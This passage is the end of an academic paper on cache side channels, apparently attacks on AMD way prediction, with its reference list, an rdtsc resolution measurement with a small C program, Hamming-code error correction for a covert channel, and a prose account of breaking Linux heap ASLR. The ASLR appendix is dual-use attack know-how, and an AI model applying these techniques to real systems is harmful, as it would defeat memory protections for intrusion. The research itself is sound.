[25] Leon Groot Bruinderink, Andreas Hülsing, Tanja Lange, and Yuval Yarom. 2016. Flush, Gauss, and Reload – A Cache Attack on the BLISS Lattice-Based Signature Scheme. In CHES.
[26] William Gropp, Ewing Lusk, Nathan Doss, and Anthony Skjellum. 1996. A high-performance, portable implementation of the MPI message passing interface standard. Parallel Computing (1996).
[27] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard. 2017. KASLR is Dead: Long Live KASLR. In ESSoS.
[28] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Mangard. 2016. Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR. In CCS.
[29] Daniel Gruss, Clémentine Maurice, and Stefan Mangard. 2016. Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript. In DIMVA.
[30] Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. 2016. Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA.
[31] Daniel Gruss, Raphael Spreitzer, and Stefan Mangard. 2015. Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security Symposium.
[32] Shay Gueron. 2012. Intel Advanced Encryption Standard (Intel AES) Instructions Set – Rev 3.01.
[33] Richard W Hamming. 1950. Error detecting and error correcting codes. The Bell System Technical Journal (1950).
[34] Joel Hruska. 2019. AMD Gains Market Share in Desktop and Laptops, Slips in Servers. https://www.extremetech.com/computing/291032-amd
[35] Ralf Hund, Carsten Willems, and Thorsten Holz. 2013. Practical Timing Side Channel Attacks against Kernel Space ASLR. In S&P.
[36] Koji Inoue, Tohru Ishihara, and Kazuaki Murakami. 1999. Way-predicting set-associative cache for high performance and low energy consumption. In Symposium on Low Power Electronics and Design.
[37] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2015. S$A: A Shared Cache Attack that Works Across Cores and Defies VM Sandboxing – and its Application to AES. In S&P.
[38] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2016. Cross processor cache attacks. In AsiaCCS.
[39] Yeongjin Jang, Sangho Lee, and Taesoo Kim. 2016. Breaking Kernel Address Space Layout Randomization with Intel TSX. In CCS.
[40] Richard E Kessler. 1999. The Alpha 21264 Microprocessor. IEEE Micro (1999).
[41] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, and Yuval Yarom. 2019. Spectre Attacks: Exploiting Speculative Execution. In S&P.
[42] Paul C. Kocher. 1996. Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems. In CRYPTO.
[43] Robert Könighofer. 2008. A Fast and Cache-Timing Resistant Implementation of the AES. In CT-RSA.
[44] Esmaeil Mohammadian Koruyeh, Khaled Khasawneh, Chengyu Song, and Nael Abu-Ghazaleh. 2018. Spectre Returns! Speculation Attacks using the Return Stack Buffer. In WOOT.
[45] Marcin Krzyzanowski. 2019. CryptoSwift: Growing collection of standard and secure cryptographic algorithms implemented in Swift. https://cryptoswift.io
[46] Linux. 2019. Complete virtual memory map with 4-level page tables. https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt
[47] Linux. 2019. Linux Kernel 5.0 Process (x86). https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/process.c
[48] Moritz Lipp, Daniel Gruss, Raphael Spreitzer, Clémentine Maurice, and Stefan Mangard. 2016. ARMageddon: Cache Attacks on Mobile Devices. In USENIX Security Symposium.
[49] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, and Mike Hamburg. 2018. Meltdown: Reading Kernel Memory from User Space. In USENIX Security Symposium.
[50] Fangfei Liu, Yuval Yarom, Qian Ge, Gernot Heiser, and Ruby B. Lee. 2015. Last-Level Cache Side-Channel Attacks are Practical. In S&P.
[51] G. Maisuradze and C. Rossow. 2018. ret2spec: Speculative Execution Using Return Stack Buffers. In CCS.
[52] Clémentine Maurice, Nicolas Le Scouarnec, Christoph Neumann, Olivier Heen, and Aurélien Francillon. 2015. Reverse Engineering Intel Complex Addressing Using Performance Counters. In RAID.
[53] Clémentine Maurice, Manuel Weber, Michael Schwarz, Lukas Giner, Daniel Gruss, Carlo Alberto Boano, Stefan Mangard, and Kay Römer. 2017. Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS.
[54] Ahmad Moghimi, Gorka Irazoqui, and Thomas Eisenbarth. 2017. CacheZoom: How SGX amplifies the power of cache attacks. In CHES.
[55] Richard Moore. 2017. pyaes: Pure-Python implementation of AES block-cipher and common modes of operation. https://github.com/ricmoo/pyaes
[56] Louis-Marie Vincent Mouton, Nicolas Jean Phillippe Huot, Gilles Eric Grandou, and Stephane Eric Sebastian Brochier. 2012. Cache accessing using a micro TAG. US Patent 8,151,055.
[57] Yossef Oren, Vasileios P Kemerlis, Simha Sethumadhavan, and Angelos D Keromytis. 2015. The Spy in the Sandbox: Practical Cache Attacks in JavaScript and their Implications. In CCS.
[58] Dag Arne Osvik, Adi Shamir, and Eran Tromer. 2006. Cache Attacks and Countermeasures: the Case of AES. In CT-RSA.
[59] Colin Percival. 2005. Cache missing for fun and profit. In BSDCan.
[60] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, and Stefan Mangard. 2016. DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks. In USENIX Security Symposium.
[61] Moinuddin K Qureshi. 2019. New attacks and defense for encrypted-address cache. In ISCA.
[62] Chester Rebeiro, A. David Selvakumar, and A. S. L. Devi. 2006. Bitslice Implementation of AES. In Cryptology and Network Security (CANS).
[63] David J Sager and Glenn J Hinton. 2002. Way-predicting cache memory. US Patent 6,425,055.
[64] Michael Schwarz, Claudio Canella, Lukas Giner, and Daniel Gruss. 2019. Store-to-Leak Forwarding: Leaking Data on Meltdown-resistant CPUs. arXiv:1905.05725 (2019).
[65] Michael Schwarz, Daniel Gruss, Samuel Weiser, Clémentine Maurice, and Stefan Mangard. 2017. Malware Guard Extension: Using SGX to Conceal Cache Attacks. In DIMVA.
[66] Michael Schwarz, Moritz Lipp, Daniel Gruss, Samuel Weiser, Clémentine Maurice, Raphael Spreitzer, and Stefan Mangard. 2018. KeyDrown: Eliminating Software-Based Keystroke Timing Side-Channel Attacks. In NDSS.
[67] Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck, Julian Stecklina, Thomas Prescher, and Daniel Gruss. 2019. ZombieLoad: Cross-Privilege-Boundary Data Sampling. In CCS.
[68] Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard. 2017. Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript. In FC.

[69] Michael Schwarz, Martin Schwarzl, Moritz Lipp, and Daniel Gruss. 2019. NetSpectre: Read Arbitrary Memory over Network. In ESORICS.
[70] Mark Seaborn. 2015. How physical addresses map to rows and banks in DRAM. http://lackingrhoticity.blogspot.com/2015/05/how-physical-addresses-map-to-rows-and-banks.html
[71] Raphael Spreitzer and Thomas Plos. 2013. Cache-Access Pattern Attack on Disaligned AES T-Tables. In COSADE.
[72] Junko Takahashi, Toshinori Fukunaga, Kazumaro Aoki, and Hitoshi Fuji. 2013. Highly accurate key extraction method for access-driven cache attacks using correlation coefficient. In ACISP.
[73] Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark Silberstein, Thomas F. Wenisch, Yuval Yarom, and Raoul Strackx. 2018. Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution. In USENIX Security Symposium.
[74] Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Giorgi Maisuradze, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2019. RIDL: Rogue In-flight Data Load. In S&P.
[75] VMWare. 2018. Security considerations and disallowing inter-Virtual Machine Transparent Page Sharing (2080735). https://kb.vmware.com/s/article/2080735
[76] Mario Werner, Thomas Unterluggauer, Lukas Giner, Michael Schwarz, Daniel Gruss, and Stefan Mangard. 2019. ScatterCache: Thwarting Cache Attacks via Cache Set Randomization. In USENIX Security Symposium.
[77] Felix Wilhelm. 2016. PoC for breaking hypervisor ASLR using branch target buffer collisions. https://github.com/felixwilhelm/mario_baslr
[78] Henry Wong. 2013. Intel Ivy Bridge Cache Replacement Policy. http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/
[79] John C Wray. 1992. An Analysis of Covert Timing Channels. Journal of Computer Security 1, 3-4 (1992), 219–232.
[80] Mengjia Yan, Read Sprabery, Bhargava Gopireddy, Christopher Fletcher, Roy Campbell, and Josep Torrellas. 2019. Attack directories, not caches: Side channel attacks in a non-inclusive world. In S&P.
[81] Yuval Yarom and Katrina Falkner. 2014. Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack. In USENIX Security Symposium.
[82] Xiaokuan Zhang, Yuan Xiao, and Yinqian Zhang. 2016. Return-oriented flush-reload side channels on ARM and their implications for Android devices. In CCS.
[83] Yinqian Zhang, Ari Juels, Michael K. Reiter, and Thomas Ristenpart. 2014. Cross-Tenant Side-Channel Attacks in PaaS Clouds. In CCS.

A RDTSC RESOLUTION

We measure the resolution of the rdtsc instruction using the following experimental setup. We assume that the timestamp counter (TSC) is updated in a fixed interval. This assumption is based on the documentation in the manual that the timestamp counter is independent of the CPU frequency [5]. Hence, there is a modulus x and a constant C, such that TSC mod x ≡ C iff x is the TSC increment. We can easily find this x with brute force, i.e., trying all different x until we find an x which always results in the same value C. Table 3 shows the rdtsc increments for the CPUs we tested.

Table 3: rdtsc increments on various CPUs.

Setup   CPU                              µ-arch.       Increment
Lab     AMD X2 3800+                     K8            1
Lab     AMD Turion II Neo N40L           K10           1
Lab     AMD Phenom II X6 1055T           K10           1
Lab     AMD E-450                        Bobcat        1
Lab     AMD Athlon 5350                  Jaguar        1
Lab     AMD FX-4100                      Bulldozer     1
Lab     AMD FX-8350                      Piledriver    1
Lab     AMD A10-7870K                    Steamroller   1
Lab     AMD Ryzen Threadripper 1920X     Zen           35
Lab     AMD Ryzen Threadripper 1950X     Zen           34
Lab     AMD Ryzen Threadripper 1700X     Zen           34
Lab     AMD Ryzen Threadripper 2970WX    Zen+          30
Lab     AMD Ryzen 7 3700X                Zen 2         36
Cloud   AMD EPYC 7401p                   Zen           20
Cloud   AMD EPYC 7571                    Zen           22
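The brute-force search described above can be implemented in a few lines of C, as sketched below; the sample count and the maximum candidate increment are arbitrary choices, and the program simply reports the largest modulus under which all recorded TSC values are congruent.

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

#define SAMPLES 10000
#define MAX_INC 100

int main(void)
{
    static uint64_t tsc[SAMPLES];
    for (int i = 0; i < SAMPLES; i++)
        tsc[i] = __rdtsc();            /* record raw timestamp-counter values */

    /* The largest x under which all samples share the same remainder C is
     * the TSC increment (smaller divisors of the increment also match). */
    for (int x = MAX_INC; x >= 1; x--) {
        uint64_t c = tsc[0] % x;
        int ok = 1;
        for (int i = 1; i < SAMPLES && ok; i++)
            ok = (tsc[i] % x) == c;
        if (ok) {
            printf("rdtsc increment: %d\n", x);
            return 0;
        }
    }
    return 1;
}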

B COVERT CHANNEL ERROR RATE

Figure 6 illustrates the error rate of the covert channel described in Section 5.1. The error rate increases drastically when transmitting more than 64 bits in parallel. Thus, we evaluated different Hamming codes on an AMD Ryzen Threadripper 1920X (Figure 7).

[Figure 6: Error rate of the covert channel, plotted as error rate in % over the number of parallel channels.]

[Figure 7: Error rate of the covert channel with and without error correction using different Hamming codes (no error correction, Hamming(7,4), Hamming(15,11)).]
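For reference, the following self-contained C sketch shows one standard construction of the Hamming(7,4) code evaluated above: four data bits are protected by three parity bits so that the receiver can correct a single flipped bit per codeword. How the seven code bits are mapped onto the parallel covert-channel transmissions is left to the transmitter and receiver.

#include <stdint.h>

/* Hamming(7,4) encoder: data bits d1..d4 are placed at positions 3,5,6,7 and
 * parity bits p1,p2,p3 at positions 1,2,4 of the codeword (1-indexed). */
static uint8_t hamming74_encode(uint8_t data)
{
    uint8_t d1 = (data >> 3) & 1, d2 = (data >> 2) & 1,
            d3 = (data >> 1) & 1, d4 = data & 1;
    uint8_t p1 = d1 ^ d2 ^ d4;        /* covers positions 1,3,5,7 */
    uint8_t p2 = d1 ^ d3 ^ d4;        /* covers positions 2,3,6,7 */
    uint8_t p3 = d2 ^ d3 ^ d4;        /* covers positions 4,5,6,7 */
    return (uint8_t)((p1 << 6) | (p2 << 5) | (d1 << 4) |
                     (p3 << 3) | (d2 << 2) | (d3 << 1) | d4);
}

/* Decoder: recompute the parity checks; a non-zero syndrome is the position
 * of the single flipped bit, which is corrected before extracting the data. */
static uint8_t hamming74_decode(uint8_t cw)
{
    uint8_t b[8];                     /* received bits, 1-indexed */
    for (int i = 1; i <= 7; i++)
        b[i] = (cw >> (7 - i)) & 1;

    uint8_t s1 = b[1] ^ b[3] ^ b[5] ^ b[7];
    uint8_t s2 = b[2] ^ b[3] ^ b[6] ^ b[7];
    uint8_t s3 = b[4] ^ b[5] ^ b[6] ^ b[7];
    int syndrome = (s3 << 2) | (s2 << 1) | s1;
    if (syndrome)
        b[syndrome] ^= 1;

    return (uint8_t)((b[3] << 3) | (b[5] << 2) | (b[6] << 1) | b[7]);
}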
C USERSPACE ASLR

Linux also uses ASLR for user processes by default. However, randomizing the code section requires compiler support for position-independent code. The heap memory region is of particular interest because it is located just after the code section with an offset of up to 32 MB [47]. User programs use 4 kB pages, giving an effective 13-bit entropy for the start of the brk-based heap memory.

It is possible to fully break heap ASLR through the use of µTags. An attack requires an interface to the victim application that incurs a victim access to data on the heap. We evaluated the ASLR break using a client-server scenario in a toy application, where the attacker is the malicious client. The attacker repeatedly sends benign requests until it is distinguishable which µTag is being accessed by the victim. This already reduces the ASLR entropy by 8 bits because it reveals a linear combination of the address bits. It is also possible to recover all address bits up to bit 27 by using the µTags of multiple pages and solving the resulting equation system.

Again, a limitation is that the attack is susceptible to noise. Too many accesses while processing the attacker's request negatively impact the measurements such that the attacker will always observe a cache miss. In our experiments, we were not able to mount the attack using a socket-based interface. Hence, attacking other user-space applications that rely on a more complex interface, e.g., using D-Bus, is currently not practical. However, future work may refine our techniques to also mount attacks in more noisy scenarios. For our evaluation, we targeted a shared-memory-based API for high-speed transmission without system calls [26] provided by the victim application. We were able to recover 13 bits with an average success rate of 88.9 % in 1.94 s (σ = 1.76 s, n = 1000).